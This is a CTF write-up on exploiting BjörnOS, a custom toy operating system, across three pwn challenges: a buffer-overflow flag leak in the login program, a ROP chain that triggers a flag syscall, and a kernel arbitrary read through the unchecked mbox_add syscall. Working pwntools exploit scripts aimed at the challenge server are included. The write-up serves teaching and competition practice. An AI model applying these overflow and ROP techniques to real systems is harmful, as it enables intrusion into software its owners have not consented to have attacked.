
EPFL's CTF team

BjörnCTF 2020 - BjörnOS [pwn 484 + 484 + 500]


This is a series of 3 pwn challenges where we have to exploit a custom operating system that runs inside QEMU. We first exploit a buffer overflow in the login program to get the first flag, then gain code execution in userland to get the second, and finally pwn the kernel to get the third.

Part 1: login

I found a computer of the kidnappers that I heard is vulnerable. Unfortunately, it is running a custom operating system. I was able to get a hold of the boot floppy and also managed to extract the kernel as well as the login module. For now, the login module should be enough though. I also noticed, that the floppy has something written on it:

BjörnOS: An operating system for ice bears.

The challenge contains a floppy disk image (floppy.img), two ELF executables for x86 (kernel and login), and scripts to run it all in QEMU. When we mount the disk image, we can see that it contains copies of kernel and login and the GRUB bootloader in the boot/grub folder. This folder also contains menu.lst, the configuration file for GRUB.

default 0
timeout 0

title alpha
root (fd0)
kernel /kernel flagbot{this_is_a_test_flag}
# module /modules/init u
# module /modules/ps2 u
# module /modules/cmos u
# module /modules/vt u
# module /modules/rootfs u
# module /modules/ramfs u
# module /modules/vfs u
module /modules/login flagbot{this_is_a_test_flag} u

The boot script tells GRUB to boot the kernel and then run the login program. It also gives a test flag as a command line argument to both the kernel and login. We can see what the interface looks like by starting the target in QEMU:

$ ./run.sh


Welcome to BjörnOS!
login: asdf

password for asdf
: asdf

Sorry my friend, you have yet to learn the power of overflowing a buffer!

We can see that we are indeed interacting with login over a serial port. Our random username/password obviously didn’t work, but the challenge already nudges us in the right direction: we have to overflow a buffer.

With that in mind, let’s have a look at the binaries. We will analyze login first because that is what we are interacting with on the serial port. Both binaries are in standard ELF format for x86, so we can simply load them into our favorite analysis tools. We used Ghidra for this challenge because it has a decompiler, and reading C pseudocode is much easier than reading assembly. While decompilers don’t always produce accurate output, they are usually enough for pwn tasks which are usually simple binaries. On top of that, both binaries from this challenge have debug symbols which really help the decompiler.

login’s main function looks like this:

s32 module_main(s32 argc,s8 **argv)

  s8 *psVar1;
  s32 sVar2;
  s8 **full_cmd;
  s8 password [16];
  s8 username [16];
  s8 flag [32];

  psVar1 = strchr(*argv,0x20);
  strncpy(flag,psVar1 + 1,0x20);
  kprintf("Welcome to BjörnOS!\n");
  kprintf("login: ");
  kprintf("\npassword for %s: ",username);
  sVar2 = strcmp(password,flag);
  if (sVar2 != 0) {
    kprintf("\nSorry my friend, you have yet to learn the power of overflowing a buffer!");
    return 0;
  kprintf("\nWell done my friend, now give me more data: ");
  return 0;

This function uses kprintf to print output, and getline and getnline to read from the serial port. getnline seems to have bounds checking because it takes the length of the buffer as the second argument, but getline only takes the address of the buffer and so it likely doesn’t do any sort of bounds checking. We found our buffer overflow.

Since username is located on the stack we could smash the stack and overwrite the return address of the function with one of our choosing to take control of the program. However while that works, there is also an easier way: let’s have a look at the function’s stack frame layout to see what we would be overflowing into:

Stack frame of module_main

flag is located immediately after username, and username is printed right after our call to getline. C strings are null-terminated and if we fill username with non-null characters we will erase its null terminator. When login later prints the username, kprintf will not stop at the end of the buffer and also print out the flag. This would not work if getline added a null terminator at the end of the input like the standard C gets, but as luck would have it getline doesn’t add any null terminators.

This is very easy to exploit: we just have to enter a 15 character username (the newline character takes the last slot in the buffer).

$ nc pwn.flagbot.ch 8070


Welcome to BjörnOS!


Part 2 - userland

I found another computer running the same operating system. Unfortunately, it looks like the login module does not receive the flag anymore. I have overheard something about a “suissecall” though.

Indeed, “suissecall” sounds familiar 😉

Part 2 has the same format as the previous. However this time login does not receive the flag anymore:

default 0
timeout 0

title alpha
root (fd0)
kernel /kernel flagbot{this_is_a_test_flag}
# module /modules/init u
# module /modules/ps2 u
# module /modules/cmos u
# module /modules/vt u
# module /modules/rootfs u
# module /modules/ramfs u
# module /modules/vfs u
module /modules/login u

This means that we have to extract it from the kernel somehow. Let’s open the kernel in Ghidra and see what’s inside.

In an OS, userland programs interact with the kernel through system calls (or syscalls). The kernel usually has a handler function for each syscall and a centralized entry point that selects and runs the right handler. In the challenge’s kernel this is the function syscall_handler, which is basically a big switch-case. Since the pseudocode for this function is fairly long, I cut out the parts that are irrelevant to the task:

cpu_state_t *syscall_handler(cpu_state_t *state)
    switch(state->eax) {
    /* Other cases... */

    case 0x37:
        kprintf("Here is your flag: %s\n", cmdline);
        return state;

    /* Other cases... */

Ok, that seems pretty easy! We only have to invoke syscall 0x37 from userspace and the kernel will print out the flag. But how do we do that? On 32-bit x86 Linux userspace programs invoke syscalls by putting the arguments in the right registers, the syscall number in eax, and executing the int 0x80 instruction. But what about this custom OS? One way to find out is to disassemble the login program and look for the functions that invoke system calls.

void __cdecl kcon_puts(s8 * s)

push ebx
mov eax, 0x1
mov ebx, dword ptr [esp + s]
int 0x30
pop ebx

This looks very similar to how system calls work on 32-bit x86 Linux, except it uses int 0x30 instead of int 0x80. We already know that eax holds the system call number because we saw that the syscall handler switches on the value of eax. Our target system call does not take any arguments so we don’t need to worry about those for now. All we have to do is set eax to 0x37 and execute int 0x30 from userspace. Therefore our next step is to find a vulnerability in login that lets us execute arbitrary code in userspace.

s32 module_main(s32 argc,s8 **argv)
  s8 username [16];

  kprintf("Welcome to BjörnOS 2.0!\n");
  kprintf("login: ");
  return 0;

u8 check_password(s8 *username)
  s32 sVar1;
  s8 password [16];

  kprintf("\npassword for %s: ",username);
  sVar1 = strcmp("easy\n",password);
  if (sVar1 != 0) {
    kprintf("\nSorry my friend, this is the wrong password\n");
    return '\0';
  kprintf("\nLogged in! Have you heard about our syscalls yet?\n");
  kprintf("P.S. We value security very much, so your password is safely stored at 0x%x\n",password);
  kprintf("P.P.S Please don\'t try anything stupid with the value at 0x%x\n",register0x00000010);
  return '\0';

This version doesn’t use getline anymore but it uses getnline with a length of 0x400 to read data into a 16 byte stack buffer, which means that we still have an exploitable buffer overflow. Awesome! We can exploit this by overwriting the return address of check_password. This OS doesn’t seem to implement non-executable memory we could place some shellcode on the stack and jump to it, but I chose to go with a ROP chain purely out of habit. The OS doesn’t have ASLR either so we don’t need an infoleak, and login has plenty of gadgets.

from pwn import *

r = remote('pwn.flagbot.ch', 8071)

rop = b''.join([
    # Set eax to 0x37
    p32(0x40004467), # pop eax; ret;

    # Invoke syscall
    p32(0x400000FA), # int 0x30

r.sendlineafter(b'login: ', b'a')
r.sendlineafter(b'password for a', b'A' * 28 + rop)


The target will crash immediately after returning from the syscall, but we don’t really care because by that time it will have already printed the flag.

$ python3 exploit.py
[+] Opening connection to pwn.flagbot.ch on port 8071: Done
[*] Switching to interactive mode


Sorry my friend, this is the wrong password
Here is your flag: /kernel bjorn{4h_th3y_me4nt_syscall}

Part 3 - kernel

Seems like they finally distrust userland code. But apparently the kernel code is still littered with bugs.

The setup for this part is the same as the second part, except that the get_flag system call has now been patched:

cpu_state_t *syscall_handler(cpu_state_t *state)
    switch(state->eax) {
    /* Other cases... */

    case 0x37:
        kprintf("The secret you are looking for is in another castle (@ 0x%x)\n", cmdline);
        return state;

    /* Other cases... */

cmdline still contains the command line of the kernel which contains the flag, just like in the previous challenge. However it is no longer possible to ask the kernel to print its content, only its address. We will have to find another way to read out the flag. We do not need to get full code execution in the kernel, we simply need to be able to read its memory. We can still use the exploit from part 2 to see where the flag is stored in memory:

[+] Opening connection to pwn.flagbot.ch on port 8072: Done
[*] Switching to interactive mode


Sorry my friend, this is the wrong password
The secret you are looking for is in another castle (@ 0x2000)

The challenge OS has 55 system calls and most of them are fairly small, so it’s feasible to manually audit all of them for vulnerabilities. In the past I’ve found that custom/hobby OSes often have bad or no input validation in syscalls, so I started by looking at that. kcon_puts (the system call that prints to the serial console) is system call 1 and it already tells us some useful facts:

  case 1:
    if (state->ebx < 0x40000000) {
      state->eax = 0x80000002;
      return state;
    state->eax = 1;
    return state;

Firstly we can see that there is indeed some form of input validation: ebx contains the address of the string to print and the syscall handler checks that this contains a userspace address. Had this check been missing we would have been able to print the flag by simply passing 0x2000 to kcon_puts, even though the flag is not in userspace memory. It appears that this OS uses a fixed split for virtual memory: all addresses below 0x40000000 belong to the kernel and the others belong to userspace.

More importantly, we can also see that input validation seems to have been done in an ad-hoc way: mainstream kernels like Linux always dereference user-provided pointers using special functions that have this kind of check built in (copy_from_user and copy_to_user). This makes it harder for programmers to forget input validation and easier for reviewers to catch such mistakes. The author of this kernel did not do that and instead wrote the validation code manually each time. Therefore it is possible that they forgot a check somewhere. This is promising, so let’s audit the kernel for this kind of mistake.

I spent some time skimming through all the system call handlers to search for missing validation and finally found something in mbox_add (part of the code omitted for clarity):

s32 mbox_add(process_t *caller,process_t *p,ipcid_t id,void *payload,u32 length)
  if ((length > 0x1000) || (payload == NULL)) {
    return -0x7ffffffb;

  mbox_t *mailbox = _mbox_find(p,id);
  if (mailbox == NULL) {
    return -0x7ffffffd;

  /* ... */

  _mboxitem *item = kmalloc(8);
  if (item == NULL) {
    sVar1 = -0x7ffffffc;

  void *dst = kmalloc(length);
  item->payload = dst
  if (dst == NULL) {
    return -0x7ffffffc;

  memcpy(dst, payload, length); // <----------------------------

  item->length = length;
  queue_add(mailbox->items, item);
  mailbox->count = mailbox->count + 1;

  return 1;

We can see that while this function does do some input validation, it is not checking that payload points to user memory. payload is a system call argument which is fully controlled by the userspace process. The system call handler doesn’t do any validation on it either, so we can memcpy up to 0x1000 bytes from any address to a buffer somewhere in the kernel. This function is part of the mbox_ family of system calls which seems to implement a sort of FIFO queue (a “mailbox”) for interprocess communication. Processes can create a mailbox and use it to receive messages from other processes. When a process wants to send data to a mailbox it calls mbox_add which memcpys the data from the given address to a buffer in the kernel and adds this buffer to the mailbox’s queue. Since there are no checks on the source address of the memcpy we can read any memory in the kernel by sending a message to a mailbox with the data we want to read as payload and then retrieve it using mbox_get. We can use this vulnerability to retrieve the content of the flag to a userspace address and then print them to the console.

Since login is the same as in the previous part, we can reuse the exploit for part 2 but change the ROP chain so that it creates a mailbox, sends a message to it, receives it to an address in userspace (e.g., somewhere in .bss) and finally prints it with kcon_puts. Again, I could have done this by writing shellcode somewhere in memory but I did it using ROP purely out of habit.

from pwn import *

def set_eax(eax):
    return b''.join([
    p32(0x40004467), # pop eax; ret;

def set_ebx(ebx):
    return b''.join([
    # 0x400033a0: pop ebx; ret;

def set_ecx_edx(ecx, edx):
    return b''.join([
    # 0x4000016c: pop edx; pop ecx; ret;

def set_ebx_esi_edi(ebx, esi, edi):
    return b''.join([
    # 0x4000038b: pop ebx; pop esi; pop edi; ret;

int30_ret = p32(0x40000145)

def create_mailbox(ipc_id, limit, msg_size, flags):
    return b''.join([
        set_ebx_esi_edi(ipc_id >> 32, msg_size, flags),
        set_ecx_edx(ipc_id & 0xffffffff, limit),

def mailbox_add(pid, ipc_id, payload, length):
    return b''.join([
        set_ebx_esi_edi(pid, payload, length),
        set_ecx_edx(ipc_id >> 32, ipc_id & 0xffffffff),

def mailbox_get(pid, ipc_id, payload, len_maxlen_addr):
    return b''.join([
        set_ebx_esi_edi(pid, payload, len_maxlen_addr),
        set_ecx_edx(ipc_id >> 32, ipc_id & 0xffffffff),

def puts(addr):
    return b''.join([

r = remote('pwn.flagbot.ch', 8072)

rop_start = 0x40007f94
bss = 0x40006008

rop = b''.join([
    create_mailbox(0, 2, 1000, 0),
    mailbox_add(1, 0, 0x2000, 100),
    mailbox_get(1, 0, bss, rop_start + 4),

assert b'\n' not in rop and len(rop) < 0x400

r.sendlineafter(b'login: ', b'a')
r.sendlineafter(b'password for a', b'A' * 28 + rop)

$ python3 exploit2.py
[+] Opening connection to pwn.flagbot.ch on port 8072: Done
[*] Switching to interactive mode

: AAAAAAAAAAAAAAAAAAAAAAAAAAAA\x8b\x03\x00\x00\x00\\x03\x00\x00\x00\x00\x00\x00\x00\x00gD\x00"\x00\x00E\x00\x8b\x03@\x00\x00\x00\x00d\x00\x00l\x00\x00\x00\x00\x00\x00\x00D\x00*\x00\x00E\x00\x8b\x03@\x00\x0`\x00\x98\x7f\x00@l\x00@\x00\x00\x00\x00\x00D\x00+\x00\x00E\x00\xa03\x0`\x00@gD\x00\x00\x00\x00

Sorry my friend, this is the wrong password
/kernel bjorn{n0w_g3t_cod3_ex3cuti0n}

And that’s it! Getting code execution would not have been hard because mbox_get essentially has the exact same vulnerability as mbox_add but in reverse (it gives you an arbitrary write rather than an arbitrary read) and we could have used it to overwrite a system call handler or a return address. However we didn’t need it to get the flag so I didn’t write an exploit that does it (but you can always try!).


I want to thank the author of these three tasks, they were great fun to solve and interesting. Unfortunately I didn’t have a lot of time to play during the weekend of the CTF and only managed to solve pwn challenges and one reverse. I’m sure the other categories would have been great fun too. Still, we got first blood on all 3 levels of this task and we are the only team who solved part 3, so I’m not disappointed.

Thanks to Specter for feedback on this writeup.